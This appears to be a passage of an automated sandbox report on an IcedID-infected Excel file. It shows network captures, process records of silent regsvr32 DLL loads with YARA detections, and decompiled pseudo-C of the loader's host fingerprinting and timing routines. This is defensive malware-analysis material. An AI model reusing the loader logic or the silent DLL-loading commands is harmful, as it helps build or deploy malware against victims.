                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=lOvSG9X%2FFo%2BI4nY4BPSomypf2NoxaOFco55NGmQZiR4147BFRR9Egq3hSUazZ0AQm69ch3bpXkdlvozkrdJnr4rsV80CTom9NVsXlsGz%2B4dYjclvRzmhoAZ2JmepyCI8jw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 66a915cbc9c64a62-FRA
                                                                                                                                                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                  Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                  Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
                                                                                                                                                                                                  Jul 6, 2021 15:12:31.803231001 CEST967INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                  HTTPS Packets

                                                                                                                                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                  Jul 6, 2021 15:12:21.832746029 CEST13.224.92.73443192.168.2.2249168CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                  CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                                  CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                                  CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034
                                                                                                                                                                                                  Jul 6, 2021 15:12:26.234117985 CEST13.224.92.73443192.168.2.2249170CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                  CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                                  CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                                  CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034
                                                                                                                                                                                                  Jul 6, 2021 15:12:29.695225000 CEST13.224.92.73443192.168.2.2249172CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                  CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                                  CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                                  CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034

                                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                  Analysis Process: EXCEL.EXE PID: 2492 Parent PID: 584

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:15:12:39
                                                                                                                                                                                                  Start date:06/07/2021
                                                                                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                  Imagebase:0x13fc90000
                                                                                                                                                                                                  File size:27641504 bytes
                                                                                                                                                                                                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                  Analysis Process: regsvr32.exe PID: 2708 Parent PID: 2492

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:15:12:42
                                                                                                                                                                                                  Start date:06/07/2021
                                                                                                                                                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:regsvr32 -silent ..\XRAY.dll
                                                                                                                                                                                                  Imagebase:0xff620000
                                                                                                                                                                                                  File size:19456 bytes
                                                                                                                                                                                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000003.00000002.2099597118.0000000000110000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                  • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.2099688550.00000000002ED000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                  Analysis Process: regsvr32.exe PID: 3048 Parent PID: 2492

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:15:12:46
                                                                                                                                                                                                  Start date:06/07/2021
                                                                                                                                                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:regsvr32 -silent ..\XTOWN.dll
                                                                                                                                                                                                  Imagebase:0xff620000
                                                                                                                                                                                                  File size:19456 bytes
                                                                                                                                                                                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2106938981.00000000002EE000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2106965071.0000000000317000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000004.00000002.2106878534.0000000000110000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                  Analysis Process: regsvr32.exe PID: 2176 Parent PID: 2492

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:15:12:50
                                                                                                                                                                                                  Start date:06/07/2021
                                                                                                                                                                                                  Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:regsvr32 -silent ..\XZIBIT.dll
                                                                                                                                                                                                  Imagebase:0xff620000
                                                                                                                                                                                                  File size:19456 bytes
                                                                                                                                                                                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000006.00000002.2114378210.0000000000120000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                  • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000006.00000002.2114632662.00000000003FD000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  Chronological Activities

                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                  Code Analysis

                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                    Analysis Process: regsvr32.exe PID: 2708 Parent PID: 2492 regsvr32.exeCOMMON

                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                    Function 004627BC, Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    C-Code - Quality: 25%
                                                                                                                                                                                                    			E004627BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				int _t23;
				void* _t24;
				void* _t27;
				intOrPtr _t35;
				void* _t36;
				intOrPtr* _t44;
				long long _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				intOrPtr* _t62;
				signed long long _t64;
				long long* _t67;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				struct HINSTANCE__* _t79;
				void* _t80;
				CHAR* _t82;
				char* _t83;

				_t64 = __rsi;
				_t46 = __rbx;
				_t44 = _t69;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x18)) = __rbp;
				 *((long long*)(_t44 + 0x20)) = __rsi;
				_push(_t62);
				_t80 = __rcx;
				_t83 = L"; _gid=";
				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
				LoadLibraryA(_t82);
				GetProcAddress(_t79);
				_t67 = _t44;
				if(_t44 == 0) {
					L6:
					r9d = 1;
					_t23 = E00462990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x4670c4, _t77, _t78);
					L7:
					return _t23;
				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E00462990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}























                                                                                                                                                                                                    0x004627bc
                                                                                                                                                                                                    0x004627bc
                                                                                                                                                                                                    0x004627bc
                                                                                                                                                                                                    0x004627bf
                                                                                                                                                                                                    0x004627c3
                                                                                                                                                                                                    0x004627c7
                                                                                                                                                                                                    0x004627cb
                                                                                                                                                                                                    0x004627d4
                                                                                                                                                                                                    0x004627d7
                                                                                                                                                                                                    0x004627e7
                                                                                                                                                                                                    0x004627ea
                                                                                                                                                                                                    0x004627fa
                                                                                                                                                                                                    0x00462800
                                                                                                                                                                                                    0x00462806
                                                                                                                                                                                                    0x0046285f
                                                                                                                                                                                                    0x0046285f
                                                                                                                                                                                                    0x00462876
                                                                                                                                                                                                    0x0046287b
                                                                                                                                                                                                    0x00462893
                                                                                                                                                                                                    0x00462893
                                                                                                                                                                                                    0x0046280f
                                                                                                                                                                                                    0x00462814
                                                                                                                                                                                                    0x0046281f
                                                                                                                                                                                                    0x0046282c
                                                                                                                                                                                                    0x0046282c
                                                                                                                                                                                                    0x0046282f
                                                                                                                                                                                                    0x00462835
                                                                                                                                                                                                    0x0046283b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00462842
                                                                                                                                                                                                    0x00462845
                                                                                                                                                                                                    0x00462849
                                                                                                                                                                                                    0x00462894
                                                                                                                                                                                                    0x00462897
                                                                                                                                                                                                    0x0046289e
                                                                                                                                                                                                    0x004628a9
                                                                                                                                                                                                    0x004628b5
                                                                                                                                                                                                    0x004628b7
                                                                                                                                                                                                    0x004628ba
                                                                                                                                                                                                    0x004628c1
                                                                                                                                                                                                    0x004628c8
                                                                                                                                                                                                    0x004628cd
                                                                                                                                                                                                    0x004628d0
                                                                                                                                                                                                    0x004628d0
                                                                                                                                                                                                    0x004628b5
                                                                                                                                                                                                    0x004628d7
                                                                                                                                                                                                    0x004628da
                                                                                                                                                                                                    0x004628df
                                                                                                                                                                                                    0x004628e8
                                                                                                                                                                                                    0x004628ed
                                                                                                                                                                                                    0x004628f6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004628fc
                                                                                                                                                                                                    0x0046284b
                                                                                                                                                                                                    0x00462854
                                                                                                                                                                                                    0x00462859
                                                                                                                                                                                                    0x00462859

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetAdaptersInfo.IPHLPAPI(?,?,00000000,00462CFE,?,?,00000003,004624A4), ref: 0046280F
                                                                                                                                                                                                    • GetAdaptersInfo.IPHLPAPI(?,?,00000000,00462CFE,?,?,00000003,004624A4), ref: 00462845
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2099753083.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AdaptersInfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3177971545-0
                                                                                                                                                                                                    • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                    • Instruction ID: 8e02e37169c55f3fab00b64b4f2e71b8b079a56f11b60fa362506f2dbe4314e4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06319EA1605B91A2EF15EB62E90079A7760EB86F94F484126CF0D0B714FF7DC549C30A
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 00461810, Relevance: 1.7, APIs: 1, Instructions: 198memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2099753083.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                    • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                    • Instruction ID: a4f0ade3b2f593b6b20335291011d004762fbf551a48c8b811083295028b8f1e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C71B072311B9187EB24CFA6E84479A37A1FB8AB94F088526DF4A43B24EF38C555C705
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 004622DC, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LookupAccountNameW.ADVAPI32 ref: 0046233C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2099753083.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccountLookupName
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1484870144-0
                                                                                                                                                                                                    • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                    • Instruction ID: e94bb4ed929cecc6f65f593610d57a657bfa550e44808f88ba045ebe4afa3953
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8316BB2705E519AEF108FB4E9443AA33A4EB89B88F584136DB4D57B18FF38C549C346
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 00461678, Relevance: 1.6, APIs: 1, Instructions: 77nativeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • NtQuerySystemInformation.NTDLL(?,?,00000000,00462CB1,?,?,00000003,004624A4), ref: 004616CB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2099753083.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InformationQuerySystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3562636166-0
                                                                                                                                                                                                    • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                    • Instruction ID: 49e191df9af061c057f453c712fc4431cd8c5775745e495956b4b98a4e29b739
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 962153A5315B5083EF158F92A84435662A1BB86BD2F1C4036DF4A47724FF3DC945870A
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 00462434, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                    			E00462434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t40;
				void* _t41;
				signed long long _t51;
				signed long long _t52;
				signed long long _t64;
				long long _t69;
				void* _t73;
				void* _t75;
				void* _t82;

				_t82 = __r9;
				_t71 = __rsi;
				_t69 = __rdi;
				_t64 = __rdx;
				_t52 = __rbx;
				_t51 = __rax;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				 *((long long*)(_t75 + 0x20)) = __rdi;
				_t73 = _t75 - 0x57;
				_t4 = _t52 + 4; // 0x4
				_t40 = _t4;
				goto L1;
				L9:
				return 0;
				L1:
				asm("rdtsc");
				_t64 = _t64 << 0x20;
				_t51 = _t51 | _t64;
				_t52 = _t52 << 0x00000010 | __rcx;
				SleepEx(??, ??); // executed
				_t69 = _t69 - 1;
				if(_t69 != 0) {
					goto L1;
				} else {
					wsprintfA();
					E004611FC(_t73 - 0x29, _t52);
					_t37 = E0046153C(_t73 - 0x29);
					E00462C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
					_t44 = _t51;
					if(_t51 != 0) {
						_t80 = _t73 + 0x67;
						if(E00461EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
								_t27 = E0046272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
								_t55 =  *((intOrPtr*)(_t73 + 0x67));
								_t41 = _t27;
								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
									GetProcessHeap();
									HeapFree(??, ??, ??);
								}
								E00461FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
								_t49 = _t51;
								if(_t51 != 0) {
									E00462A1C(_t49, _t73 + 0x1b, _t51);
								}
							}
						}
					}
					goto L9;
				}
			}














                                                                                                                                                                                                    0x00462434
                                                                                                                                                                                                    0x00462434
                                                                                                                                                                                                    0x00462434
                                                                                                                                                                                                    0x00462434
                                                                                                                                                                                                    0x00462434
                                                                                                                                                                                                    0x00462434
                                                                                                                                                                                                    0x00462434
                                                                                                                                                                                                    0x00462439
                                                                                                                                                                                                    0x0046243f
                                                                                                                                                                                                    0x0046244d
                                                                                                                                                                                                    0x0046244d
                                                                                                                                                                                                    0x0046244d
                                                                                                                                                                                                    0x00462512
                                                                                                                                                                                                    0x00462528
                                                                                                                                                                                                    0x00462450
                                                                                                                                                                                                    0x00462454
                                                                                                                                                                                                    0x00462456
                                                                                                                                                                                                    0x0046245a
                                                                                                                                                                                                    0x00462460
                                                                                                                                                                                                    0x00462468
                                                                                                                                                                                                    0x0046246e
                                                                                                                                                                                                    0x00462472
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00462474
                                                                                                                                                                                                    0x00462482
                                                                                                                                                                                                    0x0046248c
                                                                                                                                                                                                    0x0046249d
                                                                                                                                                                                                    0x0046249f
                                                                                                                                                                                                    0x004624a4
                                                                                                                                                                                                    0x004624a7
                                                                                                                                                                                                    0x004624b0
                                                                                                                                                                                                    0x004624bf
                                                                                                                                                                                                    0x004624c1
                                                                                                                                                                                                    0x004624cc
                                                                                                                                                                                                    0x004624d2
                                                                                                                                                                                                    0x004624d7
                                                                                                                                                                                                    0x004624db
                                                                                                                                                                                                    0x004624e0
                                                                                                                                                                                                    0x004624e2
                                                                                                                                                                                                    0x004624f0
                                                                                                                                                                                                    0x004624f0
                                                                                                                                                                                                    0x004624fc
                                                                                                                                                                                                    0x00462501
                                                                                                                                                                                                    0x00462504
                                                                                                                                                                                                    0x0046250d
                                                                                                                                                                                                    0x0046250d
                                                                                                                                                                                                    0x00462504
                                                                                                                                                                                                    0x004624cc
                                                                                                                                                                                                    0x004624bf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004624a7

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.2099753083.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                                    • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                    • Instruction ID: ec861b19bd583ad65344df53b5df11799208e6208476078328c409b79f2cc9a5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0218C72300A40AAEF209FB2E5543DD23A1E789788F48442BAF4E67758FE3CD509C356
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Function 000007FEF8FB1370, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 107memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
